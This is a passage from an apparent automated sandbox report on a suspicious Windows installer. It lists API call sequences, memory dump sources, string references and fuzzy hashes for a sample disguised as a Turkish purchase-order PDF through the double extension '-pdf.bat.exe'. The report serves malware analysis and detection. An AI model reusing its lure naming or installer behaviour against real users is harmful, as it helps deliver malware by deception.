                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
                                                                  • ShowWindow.USER32(?,00000000), ref: 00405237
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                                  • ShowWindow.USER32(00000000), ref: 00405249
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 1638840714-813528018
                                                                  • Opcode ID: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
                                                                  • Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
                                                                  • Opcode Fuzzy Hash: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
                                                                  • Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                                                  • lstrcmpiW.KERNEL32(Call,004236E8,00000000,?,?), ref: 00404853
                                                                  • lstrcatW.KERNEL32(?,Call), ref: 0040485F
                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                                    • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                    • Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                  • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                                    • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                    • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                                    • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$6B
                                                                  • API String ID: 2624150263-1518062809
                                                                  • Opcode ID: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
                                                                  • Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
                                                                  • Opcode Fuzzy Hash: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
                                                                  • Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                                  APIs
                                                                    • Part of subcall function 6FBC121B: GlobalAlloc.KERNEL32(00000040,?,6FBC123B,?,6FBC12DF,00000019,6FBC11BE,-000000A0), ref: 6FBC1225
                                                                  • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6FBC1C6F
                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 6FBC1CB7
                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 6FBC1CC1
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC1CD4
                                                                  • GlobalFree.KERNEL32(?), ref: 6FBC1DB6
                                                                  • GlobalFree.KERNEL32(?), ref: 6FBC1DBB
                                                                  • GlobalFree.KERNEL32(?), ref: 6FBC1DC0
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC1FAA
                                                                  • lstrcpyW.KERNEL32(?,?), ref: 6FBC2144
                                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 6FBC21B9
                                                                  • LoadLibraryW.KERNEL32(00000008), ref: 6FBC21CA
                                                                  • GetProcAddress.KERNEL32(?,?), ref: 6FBC2224
                                                                  • lstrlenW.KERNEL32(00000808), ref: 6FBC223E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                  • String ID:
                                                                  • API String ID: 245916457-0
                                                                  • Opcode ID: c0f4de0e8fdede6ac6ab6cb9c1d89afeb3fd4687e361d0ec2f7fb44386372877
                                                                  • Instruction ID: aade557fcc27bc1087b52bcc9ff92d386574397018567168259b432e6b62a581
                                                                  • Opcode Fuzzy Hash: c0f4de0e8fdede6ac6ab6cb9c1d89afeb3fd4687e361d0ec2f7fb44386372877
                                                                  • Instruction Fuzzy Hash: 4822BD71D0468ADADB10CFB8E5806EFB7B4FF06315F54462AD1A5FB280D7706A81CB52
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                  Strings
                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow, xrefs: 004021C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow
                                                                  • API String ID: 542301482-2362822837
                                                                  • Opcode ID: 5e736e3766f6f2c84d9b8d1786969cf60f007173139c094a39c5795cedf387ff
                                                                  • Instruction ID: 3f6190fb0288cb4cc2191ecfdaddaa4006c381b8c0a92558cc12242fdf246284
                                                                  • Opcode Fuzzy Hash: 5e736e3766f6f2c84d9b8d1786969cf60f007173139c094a39c5795cedf387ff
                                                                  • Instruction Fuzzy Hash: C9414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0
                                                                  • Opcode ID: 48d5054ae9fa3c66534243b530be4ac77275d228a2fdf316ae35e55088bcbc9e
                                                                  • Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
                                                                  • Opcode Fuzzy Hash: 48d5054ae9fa3c66534243b530be4ac77275d228a2fdf316ae35e55088bcbc9e
                                                                  • Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A
                                                                  APIs
                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
                                                                  • GetSysColor.USER32(?), ref: 0040449A
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                                                  • lstrlenW.KERNEL32(?), ref: 004044BB
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                                                  • SendMessageW.USER32(00000000), ref: 0040453D
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                                                  • SetCursor.USER32(00000000), ref: 004045BC
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                                                  • SetCursor.USER32(00000000), ref: 004045D8
                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                  • String ID: 1C@$Call$N
                                                                  • API String ID: 3103080414-3974410273
                                                                  • Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                  • Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
                                                                  • Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                  • Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F
                                                                  • API String ID: 941294808-1304234792
                                                                  • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                  • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                  • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                  • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                                  • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                  • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                                  • wsprintfA.USER32 ref: 00405F4F
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                                  • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                  Similarity
                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                  • String ID: %ls=%ls$[Rename]
                                                                  • API String ID: 2171350718-461813615
                                                                  • Opcode ID: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                                                  • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                                                  • Opcode Fuzzy Hash: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                                                  • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                                                  APIs
                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                  • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                  Strings
                                                                  • *?|<>/":, xrefs: 0040656A
                                                                  • "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe", xrefs: 00406518
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406519, 0040651E
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 589700163-181516417
                                                                  • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                  • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                                                  • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                  • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                                                  • GetSysColor.USER32(00000000), ref: 004042BD
                                                                  • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                                                  • SetBkMode.GDI32(?,?), ref: 004042D5
                                                                  • GetSysColor.USER32(?), ref: 004042E8
                                                                  • SetBkColor.GDI32(?,?), ref: 004042F8
                                                                  • DeleteObject.GDI32(?), ref: 00404312
                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                  • Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
                                                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                  • Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54
                                                                  APIs
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC24DA
                                                                    • Part of subcall function 6FBC122C: lstrcpynW.KERNEL32(00000000,?,6FBC12DF,00000019,6FBC11BE,-000000A0), ref: 6FBC123C
                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 6FBC2460
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FBC247B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                  • String ID: @Hmu
                                                                  • API String ID: 4216380887-887474944
                                                                  • Opcode ID: 7396451d500e0eb79ffaa87f783c11e8834303f914b8992756469d35cf17c2cc
                                                                  • Instruction ID: db749e62777e04b98fe5898cc867fb79465e591b0806c82f5b57ab7b1beee89d
                                                                  • Opcode Fuzzy Hash: 7396451d500e0eb79ffaa87f783c11e8834303f914b8992756469d35cf17c2cc
                                                                  • Instruction Fuzzy Hash: E741DEB5008385EFD714DF25E840AAB77B8FB8A324F005A9EE946D7580DB30A585CB63
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                                                  • GetMessagePos.USER32 ref: 00404BD9
                                                                  • ScreenToClient.USER32(?,?), ref: 00404BF3
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                  • Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
                                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                  • Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4
                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                  • MulDiv.KERNEL32(000F1D76,00000064,000F1F7A), ref: 00402E3C
                                                                  • wsprintfW.USER32 ref: 00402E4C
                                                                  • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                  Strings
                                                                  • verifying installer: %d%%, xrefs: 00402E46
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: verifying installer: %d%%
                                                                  • API String ID: 1451636040-82062127
                                                                  • Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                  • Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
                                                                  • Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                  • Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98
                                                                  APIs
                                                                    • Part of subcall function 6FBC121B: GlobalAlloc.KERNEL32(00000040,?,6FBC123B,?,6FBC12DF,00000019,6FBC11BE,-000000A0), ref: 6FBC1225
                                                                  • GlobalFree.KERNEL32(?), ref: 6FBC265B
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC2690
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                   • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  • Opcode ID: bd4d9e21d16bd823aaeafd3671a297b987c34730712b7642fe0c4b99339b2682
                                                                  • Instruction ID: bf11c0eb78e3d9f535ae75cb98c9bed005553313ee1bdb1ffbc4a52bc972a8b6
                                                                  • Opcode Fuzzy Hash: bd4d9e21d16bd823aaeafd3671a297b987c34730712b7642fe0c4b99339b2682
                                                                  • Instruction Fuzzy Hash: 6A31F032504681EFCB10DF64ED98D6B77B6FB8B31471515B9F58187260C730A926CB32
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
